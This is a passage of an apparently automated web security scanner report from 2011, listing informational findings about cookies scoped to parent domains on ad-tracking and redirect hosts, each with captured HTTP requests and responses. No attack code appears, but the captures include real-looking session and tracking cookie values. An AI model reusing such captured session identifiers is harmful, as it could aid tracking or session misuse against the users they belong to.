Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.957105.790042.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 12:44:52 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 662
Date: Tue, 06 Sep 2011 12:44:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 12:44:52 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000
...[SNIP]...

9.38. http://redirect.rtrk.com/redirect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 587
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:56 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?scid=2323693
...[SNIP]...

9.39. http://sales.liveperson.net/hc/21807557/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/21807557/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hc/21807557/?&site=21807557&cmd=mTagUrl&lpCallId=407482566544-792098556877&protV=20&lpjson=1&SV%21impression-query-name=chat-scottrade-english-header&SV%21impression-query-room=chat-scottrade-english-header&id=8862763361&info=button-impression%3Achat-scottrade-english-header%28Online%20Trading%20%26%20Investing%20%u2013%20Stock%20Trading%20Tools%2C%20Platforms%20%26%20More%20%7C%20Scottrade%29&waitForVisitor=true&d=1315331337781&page=http%3A//sales.liveperson.net/hcp/width/img40.gif HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8088123106932915638; HumanClickSiteContainerID_21807557=STANDALONE; LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQCCCSCCQ=AJBDBJDAOIIOIDAHABHJGONH; HumanClickACTIVE=1315313334861

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 06 Sep 2011 12:48:59 GMT
Set-Cookie: HumanClickSiteContainerID_21807557=STANDALONE; path=/hc/21807557
Set-Cookie: LivePersonID=-5110247826455-1315313336:-1:-1:-1:-1; expires=Wed, 05-Sep-2012 12:48:59 GMT; path=/hc/21807557; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 119

lpConnLib.Process({"ResultSet": {"lpCallId":"407482566544-792098556877","lpCallConfirm":"","lpData":[{"result":40}]}});

9.40. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

9.41. http://testdm.travelers.com/trvwics.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdm.travelers.com
Path:   /trvwics.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993 HTTP/1.1
Host: testdm.travelers.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw,
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ad_guid_imp=ef62eaf6-2da3-4346-8fe2-c70fb482c03a~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/05/2011 03:44.28.962 PM EDT; redUmbrella=BD27701E6D77E3FB7CEC6F2728F9B165C580796943B8785C1738755EA976ADED3F9E774C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Content-Type: image/gif
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: ad_guid_imp=7ffd757b-6447-4d98-ae3d-054ef9348332~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/06/2011 08:45.29.491 AM EDT; Domain=.travelers.com; Expires=Wed, 5-Sep-12 12:45:29 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

9.42. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.43. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.44. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.45. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.46. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.3155718557536602/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:59 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.47. http://tr.adinterax.com/re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CYahoo_Homepage_Homerooms_Polite_Download_954x60_082211%2CC%3DHomepage%2CP%3DYahoo%2CK%3D2481772/0.8853373541496694/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

9.48. http://utdi.reachlocal.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?scid=2323693&kw=233292&pub_cr_id=8668759748 HTTP/1.1
Host: utdi.reachlocal.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26kw%3D233292; domain=.reachlocal.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.reachlocal.com; path=/
Location: http://redirect.rtrk.com/redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520225798%26rl_key%3D747249abb89e424959a67c34a59e232e%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520225798%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0
Vary: Accept-Encoding
Content-Length: 1036
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7e45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://redirect.rtrk.com/redirect?RL_rurl=http:
...[SNIP]...

9.49. http://utdi.reachlocal.net/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.html?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748&rl_track_landing_pages=1 HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309926%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXY=RLPROXY%3D; domain=.reachlocal.net; path=/
Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d0; domain=.reachlocal.net; path=/
